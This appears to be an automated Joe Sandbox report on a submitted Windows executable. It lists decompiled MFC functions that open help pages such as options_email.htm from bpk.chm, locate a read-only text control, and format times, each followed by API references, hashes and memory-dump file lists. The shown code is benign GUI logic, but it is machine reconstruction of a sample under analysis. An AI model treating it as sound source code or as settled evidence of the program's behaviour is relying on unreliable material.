Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: ClassNamestrcmp
String ID: Internet Explorer_Server
API String ID: 2652003534-3686983729
Opcode ID: 1ef7f1c3ccf3d3768f933e90645adb6b5392a48d8d3e95e6b19eed47a0a8f269
Instruction ID: 05cb03f9829cdf8719c06b74b2eda0b1fbf22a09cda3b6310d7b0a141f02eb87
Opcode Fuzzy Hash: 1ef7f1c3ccf3d3768f933e90645adb6b5392a48d8d3e95e6b19eed47a0a8f269
Instruction Fuzzy Hash: 1BE0127654411DAADF109AA59C41FDE736CAB09715F100017FD01F71D1F678EA4947A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A47C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040A47C(void* __ecx, intOrPtr _a4, struct HWND__* _a8) {
				signed int _v8;
				void* __ebp;
				struct HWND__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = FindWindowExA(_a8, 0, "RICHCNTLREADONLY", 0);
				if(_t7 == 0) {
					_push(0x4550cc);
					L0043DE26();
				} else {
					_push(_t7);
					_push(_a4);
					E0040FEA7();
				}
				return _a4;
			}

0x0040a480
0x0040a490
0x0040a498
0x0040a4aa
0x0040a4af
0x0040a49a
0x0040a49a
0x0040a49b
0x0040a49e
0x0040a4a4
0x0040a4b8

APIs

FindWindowExA.USER32 ref: 0040A490
#537.MFC42(004550CC), ref: 0040A4AF

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

Strings

RICHCNTLREADONLY, xrefs: 0040A486

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537MessageSendWindow$#535#800#823#825FindH_prologmemset
String ID: RICHCNTLREADONLY
API String ID: 1642931188-289952697
Opcode ID: a4de1f45fb76e1035bbb455a866f02f501c8462289b3f7a70b62fd3412fb812c
Instruction ID: ad741f318e9422aee35d42d8468ba4d84c1e36801fb12fb260db2242d5385764
Opcode Fuzzy Hash: a4de1f45fb76e1035bbb455a866f02f501c8462289b3f7a70b62fd3412fb812c
Instruction Fuzzy Hash: 21E08031240305FBDB10EF51EC07F5D7764AB11759F20412AB804691D1D7BCE554975D

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF02, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041FF02(void* __eax) {
				intOrPtr _v4;
				void* _t6;
				void* _t9;
				intOrPtr _t17;

				L0043E1C2();
				_t6 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 4)))) + 0x7c))();
				if(_t6 == 0) {
					return _t6;
				} else {
					_t9 = _t6;
					_push(_t9);
					_push(_t9);
					_v4 = _t17;
					_push("main.htm");
					L0043DE26();
					return E00422E3C();
				}
			}

0x0041ff02
0x0041ff0e
0x0041ff13
0x0041ff1c
0x0041ff15
0x0041ff15
0x00421d04
0x00421d08
0x00421d0b
0x00421d0f
0x00421d14
0x00421d22
0x00421d22

APIs

#1168.MFC42 ref: 0041FF02
#537.MFC42(main.htm,00000000,?,00000000), ref: 00421D14

Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB

Strings

main.htm, xrefs: 00421D0F

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922$#1168#924DesktopH_prologWindow
String ID: main.htm
API String ID: 2060578353-1955420526
Opcode ID: 4b491e887d13ba1897f0a963bd3851120e3828a0f58c56d689532f5fa593ed43
Instruction ID: b1125a8baa5846aa7d629f44a5564c70cec28a59c307ad96fafc21ad2bef4885
Opcode Fuzzy Hash: 4b491e887d13ba1897f0a963bd3851120e3828a0f58c56d689532f5fa593ed43
Instruction Fuzzy Hash: D3E0CD303101106F4B086726E40696F76D5AB88741750516FB006CF3A1DF68EC41939D

Uniqueness

Uniqueness Score: -1.00%

Function 004290DB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
timeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004290DB(void* __ecx, intOrPtr _a4, struct _SYSTEMTIME* _a8) {
				char* _v8;

				_v8 = 0;
				 *0x455ae8 = 0;
				GetTimeFormatA(0x400, 2, _a8, 0, 0x455ae8, 0x32);
				_push(0x455ae8);
				L0043DE26();
				return _a4;
			}

0x004290ee
0x004290f1
0x004290fd
0x00429106
0x00429107
0x00429111

APIs

GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,00455AE8,00000032,00000000,?,?,00429D29,?,?,?,?), ref: 004290FD
#537.MFC42(00455AE8,?,00429D29,?,?,?,?), ref: 00429107

Strings

ZE, xrefs: 004290E0

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537FormatTime
String ID: ZE
API String ID: 763113566-2731775069
Opcode ID: 2236a2860633e400c1b775be719c36affa138c5e74afcec38f29bed0b3fc8e05
Instruction ID: ab7ac30e4c100136dd73a2a49a3806999ebe9f100c8948f7f4d17300c57ca34f
Opcode Fuzzy Hash: 2236a2860633e400c1b775be719c36affa138c5e74afcec38f29bed0b3fc8e05
Instruction Fuzzy Hash: EEE08C74641224BFDB009B54EC46EEA3FACDB49351F008026FE049B282D2B09E0087A8

Uniqueness

Uniqueness Score: -1.00%

Function 00421CA8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00421CA8(void* __ecx, void* __eflags) {
				void* _t12;
				signed char* _t20;
				void* _t22;

				E0043E4E0(0x44233f, _t22);
				E0041892F(_t22 - 0x460, __eflags, 0);
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_t20 = __ecx + 0x274c;
				 *_t20 = 1;
				L0043DE7A();
				 *_t20 =  *_t20 & 0x00000000;
				 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
				_t12 = E00418A07(_t22 - 0x460);
				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
				return _t12;
			}

0x00421cad
0x00421cc3
0x00421cc8
0x00421ccc
0x00421cd8
0x00421cdb
0x00421ce0
0x00421ce3
0x00421ced
0x00421cf6
0x00421cfe

APIs

__EH_prolog.LIBCMT ref: 00421CAD

Part of subcall function 0041892F: __EH_prolog.LIBCMT ref: 00418934
Part of subcall function 0041892F: #324.MFC42(00000097,?), ref: 00418949
Part of subcall function 0041892F: CreateSolidBrush.GDI32(00EFEFEF), ref: 004189CB
Part of subcall function 0041892F: #1641.MFC42(00000000), ref: 004189D4

#2514.MFC42 ref: 00421CDB

Part of subcall function 00418A07: __EH_prolog.LIBCMT ref: 00418A0C
Part of subcall function 00418A07: #2414.MFC42(?,?,?,?,?,004189F3), ref: 00418A34
Part of subcall function 00418A07: #2414.MFC42(?,?,?,?,?,004189F3), ref: 00418A55
Part of subcall function 00418A07: #641.MFC42(?,?,?,?,?,004189F3), ref: 00418AE6

Strings

?#D, xrefs: 00421CA8

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: H_prolog$#2414$#1641#2514#324#641BrushCreateSolid
String ID: ?#D
API String ID: 3775285994-527337815
Opcode ID: 248e3db43ed6ac437d73d4ddf80255f6bdad2b72c13312c3a7a4781573dd5173
Instruction ID: 50ab66d36ff637021284a782593007f268f4fedbfceec2e6bb398c4016ea0bee
Opcode Fuzzy Hash: 248e3db43ed6ac437d73d4ddf80255f6bdad2b72c13312c3a7a4781573dd5173
Instruction Fuzzy Hash: FFF0E5B1C101948BD724EB24D9027D8BB74AF2531CF00019EA455221C2AFFD1F44CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A80C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041A80C(void* __ecx, void* __esi) {
				void* _t6;
				void* _t9;
				void* _t15;
				intOrPtr _t17;

				_t6 = E0043E4E0(0x441404, _t15);
				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
				_push("options_email.htm");
				L0043DE26();
				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
				L004044C9(_t6, _t17, __esi);
				E00422E3C();
				_t9 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
				return _t9;
			}

0x0041a811
0x0041a81a
0x0041a81d
0x0041a822
0x0041a827
0x0041a82b
0x0041a832
0x0041a83c
0x0041a83d
0x0041a845

APIs

__EH_prolog.LIBCMT ref: 0041A811
#537.MFC42(options_email.htm), ref: 0041A822

Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB

Strings

options_email.htm, xrefs: 0041A81D

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922H_prolog$#924DesktopWindow
String ID: options_email.htm
API String ID: 4033027120-3085017375
Opcode ID: 0439ff43b523b3eb5376d9774da1ba9c1f55e0efe49296d7be024e2c2f852446
Instruction ID: 996d0d0aeef533bcf352603fb1248ab4fd8a7f20386e13404718b5d22c090344
Opcode Fuzzy Hash: 0439ff43b523b3eb5376d9774da1ba9c1f55e0efe49296d7be024e2c2f852446
Instruction Fuzzy Hash: D7D02B71B10200BBCB08BBE6E40376D7B60AB88718F00871FB032972C2CBBC5941461D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B837, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040B837(void* __ecx, void* __esi) {
				void* _t6;
				void* _t9;
				void* _t15;
				intOrPtr _t17;

				_t6 = E0043E4E0(0x43fd00, _t15);
				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
				_push("options_notification.htm");
				L0043DE26();
				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
				L004044C9(_t6, _t17, __esi);
				E00422E3C();
				_t9 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
				return _t9;
			}

0x0040b83c
0x0040b845
0x0040b848
0x0040b84d
0x0040b852
0x0040b856
0x0040b85d
0x0040b867
0x0040b868
0x0040b870

APIs

__EH_prolog.LIBCMT ref: 0040B83C
#537.MFC42(options_notification.htm), ref: 0040B84D

Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB

Strings

options_notification.htm, xrefs: 0040B848

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922H_prolog$#924DesktopWindow
String ID: options_notification.htm
API String ID: 4033027120-2350321056
Opcode ID: 60b506d337661445128c903c75825619301f104fcefe1cf86aa4602ec660b1e1
Instruction ID: aa12ae82a729b3d9a5d54cd3a3462a03e7f549519319177819aadfa41fab4b01
Opcode Fuzzy Hash: 60b506d337661445128c903c75825619301f104fcefe1cf86aa4602ec660b1e1
Instruction Fuzzy Hash: 9DD02BB1F10200B7CB08BBE6A80772D7760AB88718F008B2FB032962C1CBBC5900421D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B949, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040B949(void* __ecx, void* __esi) {
				void* _t6;
				void* _t9;
				void* _t15;
				intOrPtr _t17;

				_t6 = E0043E4E0(0x43fd3c, _t15);
				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
				_push("options_notification.htm");
				L0043DE26();
				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
				L004044C9(_t6, _t17, __esi);
				E00422E3C();
				_t9 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
				return _t9;
			}

0x0040b94e
0x0040b957
0x0040b95a
0x0040b95f
0x0040b964
0x0040b968
0x0040b96f
0x0040b979
0x0040b97a
0x0040b982

APIs

__EH_prolog.LIBCMT ref: 0040B94E
#537.MFC42(options_notification.htm), ref: 0040B95F

Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB

Strings

options_notification.htm, xrefs: 0040B95A

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922H_prolog$#924DesktopWindow
String ID: options_notification.htm
API String ID: 4033027120-2350321056
Opcode ID: 8d445264253baf81820669623b1dd6486b48e8e1ae705e269fa2022031d01ba6
Instruction ID: de4b077bcafeb2fc9477f1af60ee6295d3a3491035ea70cc77dbab65dc649856
Opcode Fuzzy Hash: 8d445264253baf81820669623b1dd6486b48e8e1ae705e269fa2022031d01ba6
Instruction Fuzzy Hash: 23D0C2B1B10200A7CB08BBA6980372D76A0AB48718F008B2FB122962C1CBBC5900421D

Uniqueness

Uniqueness Score: -1.00%

Function 0041915C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041915C(void* __ecx, void* __esi) {
				void* _t6;
				void* _t9;
				void* _t15;
				intOrPtr _t17;

				_t6 = E0043E4E0(0x44103c, _t15);
				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
				_push("options_common.htm");
				L0043DE26();
				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
				L004044C9(_t6, _t17, __esi);
				E00422E3C();
				_t9 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
				return _t9;
			}

0x00419161
0x0041916a
0x0041916d
0x00419172
0x00419177
0x0041917b
0x00419182
0x0041918c
0x0041918d
0x00419195

APIs

__EH_prolog.LIBCMT ref: 00419161
#537.MFC42(options_common.htm), ref: 00419172

Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
